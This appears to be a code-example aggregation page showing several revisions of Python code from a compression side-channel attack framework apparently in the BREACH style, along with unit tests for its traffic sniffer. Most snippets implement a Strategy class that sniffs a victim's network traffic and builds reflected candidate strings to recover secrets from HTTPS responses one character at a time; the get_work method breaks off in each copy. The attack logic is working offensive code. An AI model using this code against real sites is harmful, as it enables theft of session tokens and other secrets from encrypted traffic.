Beispiel #1
0
    def __init__(self, victim):
        """Set up the attack strategy for a single victim.

        Builds the sniffer from the victim's network parameters and
        resumes from the victim's latest recorded round, bootstrapping a
        fresh attack when no round exists yet.
        """
        self._victim = victim

        # The sniffer needs the victim's network parameters to capture traffic.
        self._sniffer = Sniffer({
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        })

        # Resume from the highest round index recorded for this victim.
        latest_index = Round.objects.filter(victim=self._victim).aggregate(
            Max('index'))['index__max']

        if not latest_index:
            # No round exists yet: bootstrap the attack from round 1.
            latest_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created,
                # end the analysis.
                return

        self._round = Round.objects.filter(victim=self._victim,
                                           index=latest_index)[0]
        self._analyzed = False
Beispiel #2
0
 def setUp(self):
     """Build a Sniffer against a local endpoint with fixed victim parameters."""
     self.endpoint = 'http://localhost'
     # Static network parameters describing the victim under test.
     params = {
         'snifferendpoint': self.endpoint,
         'sourceip': '147.102.239.229',
         'host': 'dionyziz.com',
         'interface': 'wlan0',
         'port': '8080',
         'calibration_wait': 0.0
     }
     self.sniffer = Sniffer(params)
Beispiel #3
0
    def __init__(self, victim):
        """Resume (or bootstrap) the attack strategy for *victim*.

        Args:
            victim: model object exposing sniffer/network parameters and a
                ``target`` (host, port, ...).
        """
        self._victim = victim
        # This revision passes the network parameters to Sniffer positionally.
        self._sniffer = Sniffer(victim.snifferendpoint, self._victim.sourceip, self._victim.target.host, self._victim.interface, self._victim.target.port)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            # No round recorded yet: start a fresh attack from round 1.
            current_round_index = 1
            self._analyzed = True
            # NOTE(review): begin_attack() is unguarded here; if it fails to
            # create round 1, the filter below raises IndexError — confirm
            # against the caller's expectations.
            self.begin_attack()

        # Load the round to continue from; _analyzed False means analysis pending.
        self._round = Round.objects.filter(victim=self._victim, index=current_round_index)[0]
        self._analyzed = False
Beispiel #4
0
    def __init__(self, victim):
        """Resume (or bootstrap) the attack strategy for *victim*.

        Args:
            victim: model object exposing sniffer/network parameters and a
                ``target`` (host, port, alphabet, ...).
        """
        self._victim = victim

        # Network parameters the sniffer needs to capture the victim's traffic.
        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            # No round recorded yet: bootstrap the attack from round 1.
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        # Load the round to continue from; _analyzed False means analysis pending.
        self._round = Round.objects.filter(
            victim=self._victim,
            index=current_round_index
        )[0]
        self._analyzed = False
Beispiel #5
0
class SnifferTest(TestCase):
    """Unit tests for the Sniffer HTTP client, with `requests` mocked out."""

    def setUp(self):
        """Create the sniffer under test with fixed victim parameters."""
        self.endpoint = 'http://localhost'
        self.sniffer = Sniffer({
            'snifferendpoint': self.endpoint,
            'sourceip': '147.102.239.229',
            'host': 'dionyziz.com',
            'interface': 'wlan0',
            'port': '8080',
            'calibration_wait': 0.0
        })

    @patch('breach.sniffer.requests')
    def test_sniffer_start(self, requests_mock):
        """start() must issue an HTTP POST."""
        self.sniffer.start()
        self.assertTrue(requests_mock.post.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_read(self, requests_mock):
        """read() must issue an HTTP GET."""
        self.sniffer.read()
        self.assertTrue(requests_mock.get.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_delete(self, requests_mock):
        """delete() must issue an HTTP POST."""
        self.sniffer.delete()
        self.assertTrue(requests_mock.post.called)
Beispiel #6
0
class SnifferTest(TestCase):
    """Unit tests for the positional-argument Sniffer API, `requests` mocked."""

    def setUp(self):
        """Create a sniffer for a fixed endpoint plus victim connection info."""
        self.endpoint = 'http://localhost'
        self.sniffer = Sniffer(self.endpoint)

        # Victim connection that each sniffer call refers to.
        self.source_ip = '147.102.239.229'
        self.destination_host = 'dionyziz.com'

    @patch('breach.sniffer.requests')
    def test_sniffer_start(self, requests_mock):
        """start() must issue an HTTP POST."""
        self.sniffer.start(self.source_ip, self.destination_host)
        self.assertTrue(requests_mock.post.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_read(self, requests_mock):
        """read() must issue an HTTP GET."""
        self.sniffer.read(self.source_ip, self.destination_host)
        self.assertTrue(requests_mock.get.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_delete(self, requests_mock):
        """delete() must issue an HTTP POST."""
        self.sniffer.delete(self.source_ip, self.destination_host)
        self.assertTrue(requests_mock.post.called)
Beispiel #7
0
    def setUp(self):
        """Create a sniffer for a fixed endpoint plus victim connection info."""
        endpoint = 'http://localhost'
        self.endpoint = endpoint
        self.sniffer = Sniffer(endpoint)

        # Victim connection parameters used by the tests.
        self.source_ip = '147.102.239.229'
        self.destination_host = 'dionyziz.com'
Beispiel #8
0
class Strategy(object):
    """Drives a compression side-channel attack against a single victim.

    Coordinates the sniffer, the per-round attack state persisted in the
    Round model, and the work items handed out to the client.
    """

    def __init__(self, victim):
        """Resume (or bootstrap) the attack for *victim*.

        Args:
            victim: model object exposing sniffer/network parameters and a
                ``target`` (host, port, alphabet, ...).
        """
        self._victim = victim

        # Network parameters the sniffer needs to capture the victim's traffic.
        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(
            victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            # No round recorded yet: bootstrap the attack from round 1.
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        # Load the round to continue from; _analyzed False means analysis pending.
        self._round = Round.objects.filter(victim=self._victim,
                                           index=current_round_index)[0]
        self._analyzed = False

    def _build_candidates_divide_conquer(self, state):
        """Split the known alphabet into two candidate halves.

        Divide-and-conquer tests half of the remaining alphabet per
        sampleset, halving the search space each round.

        Args:
            state: dict whose 'knownalphabet' entry is a sequence of
                candidate symbols.

        Returns:
            A two-element list [bottom_half, top_half] of 'knownalphabet'.
        """
        # Use floor division so the midpoint is an int on both Python 2
        # and Python 3 ('/' yields a float in Python 3, which is not a
        # valid slice index). Identical result for ints under Python 2.
        midpoint = len(state['knownalphabet']) // 2

        bottom_half = state['knownalphabet'][:midpoint]
        top_half = state['knownalphabet'][midpoint:]

        return [bottom_half, top_half]

    def _build_candidates_serial(self, state):
        """Return every known symbol as its own candidate (serial method)."""
        # Serial testing tries one symbol at a time, so the candidate
        # collection is simply the known alphabet itself.
        candidates = state['knownalphabet']
        return candidates

    def _build_candidates(self, state):
        '''Given a state of the world, produce a list of candidate alphabets.'''
        # Dispatch to the builder matching the round's configured method;
        # an unknown method raises KeyError, as before.
        builder_for_method = {
            Target.SERIAL: self._build_candidates_serial,
            Target.DIVIDE_CONQUER: self._build_candidates_divide_conquer
        }
        builder = builder_for_method[self._round.get_method()]
        return builder(state)

    def _get_first_round_state(self):
        """Return the attack state that seeds the very first round."""
        target = self._victim.target
        # Initially every symbol of the target alphabet is a candidate.
        return {
            'knownsecret': target.prefix,
            'candidatealphabet': target.alphabet,
            'knownalphabet': target.alphabet
        }

    def _get_unstarted_samplesets(self):
        """Return the current round's samplesets that were never started."""
        return SampleSet.objects.filter(
            round=self._round,
            started=None
        )

    def _reflection(self, alphabet):
        """Build the sentinel-separated string to be reflected by the target.

        The reflection contains each candidate secret (known secret plus one
        symbol of *alphabet*), padded with dummy symbols so all samplesets of
        a batch produce equally-sized Huffman alphabets.
        """
        # We use sentinel as a separator symbol and we assume it is not part of the
        # secret. We also assume it will not be in the content.

        # Added symbols are the total amount of dummy symbols that need to be added,
        # either in candidate alphabet or huffman complement set in order
        # to avoid huffman tree imbalance between samplesets of the same batch.

        added_symbols = self._round.maxroundcardinality - self._round.minroundcardinality

        sentinel = self._victim.target.sentinel

        assert (sentinel not in self._round.knownalphabet)
        # Dummy-symbol pool: alphanumerics not already in the known alphabet.
        knownalphabet_complement = list(
            set(string.ascii_letters + string.digits) -
            set(self._round.knownalphabet))

        # One candidate secret per symbol under test.
        candidate_secrets = set()
        for letter in alphabet:
            candidate_secret = self._round.knownsecret + letter
            candidate_secrets.add(candidate_secret)

        # Candidate balance indicates the amount of dummy symbols that will be included with the
        # candidate alphabet's part of the reflection.
        candidate_balance = self._round.maxroundcardinality - len(
            candidate_secrets)
        assert (len(knownalphabet_complement) > candidate_balance)
        candidate_balance = [
            self._round.knownsecret + c
            for c in knownalphabet_complement[0:candidate_balance]
        ]

        # Empty leading/trailing entries yield sentinel delimiters at both ends.
        reflected_data = [
            '',
            sentinel.join(list(candidate_secrets) + candidate_balance), ''
        ]

        if self._round.check_huffman_pool():
            # Huffman complement indicates the knownalphabet symbols that are not currently being tested
            huffman_complement = set(self._round.knownalphabet) - set(alphabet)

            huffman_balance = added_symbols - len(candidate_balance)

            assert (len(knownalphabet_complement) >
                    len(candidate_balance) + huffman_balance)

            # NOTE(review): the slice end is `huffman_balance`, not
            # `len(candidate_balance) + huffman_balance`; when
            # candidate_balance is non-empty this selects fewer than
            # huffman_balance dummy symbols (possibly none) — confirm intended.
            huffman_balance = knownalphabet_complement[len(candidate_balance
                                                           ):huffman_balance]
            reflected_data.insert(
                1, sentinel.join(list(huffman_complement) + huffman_balance))

        reflection = sentinel.join(reflected_data)

        return reflection

    def _url(self, alphabet):
        """Build the attack URL whose response reflects *alphabet*."""
        reflection = self._reflection(alphabet)
        return self._victim.target.endpoint % reflection

    def _sampleset_to_work(self, sampleset):
        """Translate *sampleset* into a work-item dict for the client."""
        work = {
            'url': self._url(sampleset.candidatealphabet),
            'amount': self._victim.target.samplesize,
            'alignmentalphabet': sampleset.alignmentalphabet,
            'timeout': 0
        }
        return work

    def get_work(self):
        '''Produces work for the victim.

        Pre-condition: There is already work to do.'''

        # If analysis is complete or maxreflectionlength cannot be overcome
        # then execution should abort
        if self._analyzed:
            logger.debug('Aborting get_work because analysis is completed')
            return {}

        # Reaps a hanging sampleset that may exist from previous framework execution
        # Hanging sampleset condition: backend or realtime crash
        hanging_samplesets = self._get_started_samplesets()
        for s in hanging_samplesets:
            logger.warning('Reaping hanging set for: {}'.format(
                s.candidatealphabet))
            self._mark_current_work_completed(sampleset=s)

        # Start the sniffer; errors are logged, not raised.
        # NOTE: `except (...), err` is Python 2-only syntax — this module
        # targets Python 2.
        try:
            self._sniffer.start()
        except (requests.HTTPError, requests.exceptions.ConnectionError), err:
            if isinstance(err, requests.HTTPError):
                status_code = err.response.status_code
                logger.warning(
                    'Caught {} while trying to start sniffer.'.format(
                        status_code))

                # If status was raised due to conflict,
                # delete already existing sniffer.
                if status_code == 409:
                    try:
                        self._sniffer.delete()
                    except (requests.HTTPError,
                            requests.exceptions.ConnectionError), err:
                        logger.warning(
                            'Caught error when trying to delete sniffer: {}'.
                            format(err))

            elif isinstance(err, requests.exceptions.ConnectionError):
                logger.warning('Caught ConnectionError')
        # NOTE(review): this excerpt ends here; the full method presumably
        # continues to produce and return the work item — confirm against
        # the complete source.
Beispiel #9
0
class Strategy(object):
    """Drives a compression side-channel attack against a single victim.

    Older revision: the Sniffer takes positional arguments and candidate
    methods are keyed by plain strings.
    """

    def __init__(self, victim):
        """Resume (or bootstrap) the attack for *victim*."""
        self._victim = victim
        # This revision passes the network parameters to Sniffer positionally.
        self._sniffer = Sniffer(victim.snifferendpoint, self._victim.sourceip, self._victim.target.host, self._victim.interface, self._victim.target.port)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            # No round recorded yet: start a fresh attack from round 1.
            current_round_index = 1
            self._analyzed = True
            # NOTE(review): begin_attack() is unguarded here; if it fails to
            # create round 1, the filter below raises IndexError — confirm.
            self.begin_attack()

        # Load the round to continue from; _analyzed False means analysis pending.
        self._round = Round.objects.filter(victim=self._victim, index=current_round_index)[0]
        self._analyzed = False

    def _build_candidates_divide_conquer(self, state):
        """Split the known alphabet into two candidate halves.

        Args:
            state: dict whose 'knownalphabet' entry is a sequence of
                candidate symbols.

        Returns:
            A two-element list [bottom_half, top_half] of 'knownalphabet'.
        """
        # Floor division keeps the midpoint an int on both Python 2 and
        # Python 3 ('/' yields a float in Python 3, which cannot be used
        # as a slice index). Identical result for ints under Python 2.
        midpoint = len(state['knownalphabet']) // 2

        bottom_half = state['knownalphabet'][:midpoint]
        top_half = state['knownalphabet'][midpoint:]

        return [bottom_half, top_half]

    def _build_candidates_serial(self, state):
        """Return every known symbol as its own candidate (serial method)."""
        # Serial testing tries one symbol at a time; the candidate
        # collection is the known alphabet itself.
        candidates = state['knownalphabet']
        return candidates

    def _build_candidates(self, state):
        '''Given a state of the world, produce a list of candidate alphabets.'''
        # Dispatch to the builder matching the victim's configured method;
        # an unknown method raises KeyError, as before.
        builder_for_method = {
            'serial': self._build_candidates_serial,
            'divide&conquer': self._build_candidates_divide_conquer
        }
        builder = builder_for_method[self._victim.method]
        return builder(state)

    def _get_first_round_state(self):
        """Return the attack state that seeds the very first round."""
        target = self._victim.target
        # Initially every symbol of the target alphabet is a candidate.
        return {
            'knownsecret': target.prefix,
            'candidatealphabet': target.alphabet,
            'knownalphabet': target.alphabet
        }

    def _get_unstarted_samplesets(self):
        """Return the current round's samplesets that were never started."""
        return SampleSet.objects.filter(round=self._round, started=None)

    def _reflection(self, sampleset):
        """Build the '^'-separated string to be reflected by the target.

        The reflection contains each candidate secret (known secret plus one
        symbol of the sampleset's candidate alphabet), padded with dummy
        symbols so all samplesets of a batch produce equally-sized Huffman
        alphabets.
        """
        # We use '^' as a separator symbol and we assume it is not part of the
        # secret. We also assume it will not be in the content.

        # Added symbols are the total amount of dummy symbols that need to be added,
        # either in candidate alphabet or huffman complement set in order
        # to avoid huffman tree imbalance between samplesets of the same batch.
        added_symbols = self._round.maxroundcardinality - self._round.minroundcardinality

        sentinel = '^'

        assert(sentinel not in self._round.knownalphabet)
        # Dummy-symbol pool: alphanumerics not already in the known alphabet.
        knownalphabet_complement = list(set(string.ascii_letters + string.digits) - set(self._round.knownalphabet))

        # One candidate secret per symbol under test.
        candidate_secrets = set()
        for letter in sampleset.candidatealphabet:
            candidate_secret = self._round.knownsecret + letter
            candidate_secrets.add(candidate_secret)

        # Candidate balance indicates the amount of dummy symbols that will be included with the
        # candidate alphabet's part of the reflection.
        candidate_balance = self._round.maxroundcardinality - len(candidate_secrets)
        assert(len(knownalphabet_complement) > candidate_balance)
        candidate_balance = [self._round.knownsecret + c for c in knownalphabet_complement[0:candidate_balance]]

        # Huffman complement indicates the knownalphabet symbols that are not currently being tested
        huffman_complement = set(self._round.knownalphabet) - set(sampleset.candidatealphabet)

        huffman_balance = added_symbols - len(candidate_balance)
        assert(len(knownalphabet_complement) > len(candidate_balance) + huffman_balance)
        # NOTE(review): the slice end is `huffman_balance`, not
        # `len(candidate_balance) + huffman_balance`; when candidate_balance
        # is non-empty this selects fewer than huffman_balance dummy symbols
        # (possibly none) — confirm intended.
        huffman_balance = knownalphabet_complement[len(candidate_balance):huffman_balance]

        # Empty leading/trailing entries yield sentinel delimiters at both ends.
        reflected_data = [
            '',
            sentinel.join(list(candidate_secrets) + candidate_balance),
            sentinel.join(list(huffman_complement) + huffman_balance),
            ''
        ]

        reflection = sentinel.join(reflected_data)

        return reflection

    def _sampleset_to_work(self, sampleset):
        """Translate *sampleset* into a work-item dict for the client."""
        attack_url = self._victim.target.endpoint % self._reflection(sampleset)
        return {
            'url': attack_url,
            'amount': SAMPLES_PER_SAMPLESET,
            'alignmentalphabet': sampleset.alignmentalphabet,
            'timeout': 0
        }

    def get_work(self):
        '''Produces work for the victim.

        Pre-condition: There is already work to do.'''

        # Start the sniffer; errors are logged, not raised.
        # NOTE: `except (...), err` is Python 2-only syntax — this module
        # targets Python 2.
        try:
            self._sniffer.start()
        except (requests.HTTPError, requests.exceptions.ConnectionError), err:
            if isinstance(err, requests.HTTPError):
                status_code = err.response.status_code
                logger.warning('Caught {} while trying to start sniffer.'.format(status_code))

                # If status was raised due to conflict,
                # delete already existing sniffer.
                if status_code == 409:
                    try:
                        self._sniffer.delete()
                    except (requests.HTTPError, requests.exceptions.ConnectionError), err:
                        logger.warning('Caught error when trying to delete sniffer: {}'.format(err))

            elif isinstance(err, requests.exceptions.ConnectionError):
                logger.warning('Caught ConnectionError')
        # NOTE(review): this excerpt ends here; the full method presumably
        # continues to produce and return the work item — confirm against
        # the complete source.
Beispiel #10
0
class Strategy(object):
    """Drives a compression side-channel attack against a single victim.

    Coordinates the sniffer, the per-round attack state persisted in the
    Round model, and the work items handed out to the client.
    """

    def __init__(self, victim):
        """Resume (or bootstrap) the attack for *victim*.

        Args:
            victim: model object exposing sniffer/network parameters and a
                ``target`` (host, port, alphabet, ...).
        """
        self._victim = victim

        # Network parameters the sniffer needs to capture the victim's traffic.
        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            # No round recorded yet: bootstrap the attack from round 1.
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        # Load the round to continue from; _analyzed False means analysis pending.
        self._round = Round.objects.filter(
            victim=self._victim,
            index=current_round_index
        )[0]
        self._analyzed = False

    def _build_candidates_divide_conquer(self, state):
        """Split the known alphabet into two candidate halves.

        Divide-and-conquer tests half of the remaining alphabet per
        sampleset, halving the search space each round.

        Args:
            state: dict whose 'knownalphabet' entry is a sequence of
                candidate symbols.

        Returns:
            A two-element list [bottom_half, top_half] of 'knownalphabet'.
        """
        # Floor division keeps the midpoint an int on both Python 2 and
        # Python 3 ('/' yields a float in Python 3, which cannot be used
        # as a slice index). Identical result for ints under Python 2.
        midpoint = len(state['knownalphabet']) // 2

        bottom_half = state['knownalphabet'][:midpoint]
        top_half = state['knownalphabet'][midpoint:]

        return [bottom_half, top_half]

    def _build_candidates_serial(self, state):
        """Return every known symbol as its own candidate (serial method)."""
        # Serial testing tries one symbol at a time; the candidate
        # collection is the known alphabet itself.
        candidates = state['knownalphabet']
        return candidates

    def _build_candidates(self, state):
        '''Given a state of the world, produce a list of candidate alphabets.'''
        # Dispatch to the builder matching the round's configured method;
        # an unknown method raises KeyError, as before.
        builder_for_method = {
            Target.SERIAL: self._build_candidates_serial,
            Target.DIVIDE_CONQUER: self._build_candidates_divide_conquer
        }
        builder = builder_for_method[self._round.get_method()]
        return builder(state)

    def _get_first_round_state(self):
        """Return the attack state that seeds the very first round."""
        target = self._victim.target
        # Initially every symbol of the target alphabet is a candidate.
        return {
            'knownsecret': target.prefix,
            'candidatealphabet': target.alphabet,
            'knownalphabet': target.alphabet
        }

    def _get_unstarted_samplesets(self):
        """Return the current round's samplesets that were never started."""
        return SampleSet.objects.filter(round=self._round, started=None)

    def _reflection(self, alphabet):
        """Build the sentinel-separated string to be reflected by the target.

        The reflection contains each candidate secret (known secret plus one
        symbol of *alphabet*), padded with dummy symbols so all samplesets of
        a batch produce equally-sized Huffman alphabets.
        """
        # We use sentinel as a separator symbol and we assume it is not part of the
        # secret. We also assume it will not be in the content.

        # Added symbols are the total amount of dummy symbols that need to be added,
        # either in candidate alphabet or huffman complement set in order
        # to avoid huffman tree imbalance between samplesets of the same batch.

        added_symbols = self._round.maxroundcardinality - self._round.minroundcardinality

        sentinel = self._victim.target.sentinel

        assert(sentinel not in self._round.knownalphabet)
        # Dummy-symbol pool: alphanumerics not already in the known alphabet.
        knownalphabet_complement = list(set(string.ascii_letters + string.digits) - set(self._round.knownalphabet))

        # One candidate secret per symbol under test.
        candidate_secrets = set()
        for letter in alphabet:
            candidate_secret = self._round.knownsecret + letter
            candidate_secrets.add(candidate_secret)

        # Candidate balance indicates the amount of dummy symbols that will be included with the
        # candidate alphabet's part of the reflection.
        candidate_balance = self._round.maxroundcardinality - len(candidate_secrets)
        assert(len(knownalphabet_complement) > candidate_balance)
        candidate_balance = [self._round.knownsecret + c for c in knownalphabet_complement[0:candidate_balance]]

        # Empty leading/trailing entries yield sentinel delimiters at both ends.
        reflected_data = [
            '',
            sentinel.join(list(candidate_secrets) + candidate_balance),
            ''
        ]

        if self._round.check_huffman_pool():
            # Huffman complement indicates the knownalphabet symbols that are not currently being tested
            huffman_complement = set(self._round.knownalphabet) - set(alphabet)

            huffman_balance = added_symbols - len(candidate_balance)

            assert(len(knownalphabet_complement) > len(candidate_balance) + huffman_balance)

            # NOTE(review): the slice end is `huffman_balance`, not
            # `len(candidate_balance) + huffman_balance`; when
            # candidate_balance is non-empty this selects fewer than
            # huffman_balance dummy symbols (possibly none) — confirm intended.
            huffman_balance = knownalphabet_complement[len(candidate_balance):huffman_balance]
            reflected_data.insert(1, sentinel.join(list(huffman_complement) + huffman_balance))

        reflection = sentinel.join(reflected_data)

        return reflection

    def _url(self, alphabet):
        """Build the attack URL whose response reflects *alphabet*."""
        reflection = self._reflection(alphabet)
        return self._victim.target.endpoint % reflection

    def _sampleset_to_work(self, sampleset):
        """Translate *sampleset* into a work-item dict for the client."""
        work = {
            'url': self._url(sampleset.candidatealphabet),
            'amount': self._victim.target.samplesize,
            'alignmentalphabet': sampleset.alignmentalphabet,
            'timeout': 0
        }
        return work

    def get_work(self):
        '''Produces work for the victim.

        Pre-condition: There is already work to do.'''

        # If analysis is complete or maxreflectionlength cannot be overcome
        # then execution should abort
        if self._analyzed:
            logger.debug('Aborting get_work because analysis is completed')
            return {}

        # Reaps a hanging sampleset that may exist from previous framework execution
        # Hanging sampleset condition: backend or realtime crash
        hanging_samplesets = self._get_started_samplesets()
        for s in hanging_samplesets:
            logger.warning('Reaping hanging set for: {}'.format(s.candidatealphabet))
            self._mark_current_work_completed(sampleset=s)

        # Start the sniffer; errors are logged, not raised.
        # NOTE: `except (...), err` is Python 2-only syntax — this module
        # targets Python 2.
        try:
            self._sniffer.start()
        except (requests.HTTPError, requests.exceptions.ConnectionError), err:
            if isinstance(err, requests.HTTPError):
                status_code = err.response.status_code
                logger.warning('Caught {} while trying to start sniffer.'.format(status_code))

                # If status was raised due to conflict,
                # delete already existing sniffer.
                if status_code == 409:
                    try:
                        self._sniffer.delete()
                    except (requests.HTTPError, requests.exceptions.ConnectionError), err:
                        logger.warning('Caught error when trying to delete sniffer: {}'.format(err))

            elif isinstance(err, requests.exceptions.ConnectionError):
                logger.warning('Caught ConnectionError')
        # NOTE(review): this excerpt ends here; the full method presumably
        # continues to produce and return the work item — confirm against
        # the complete source.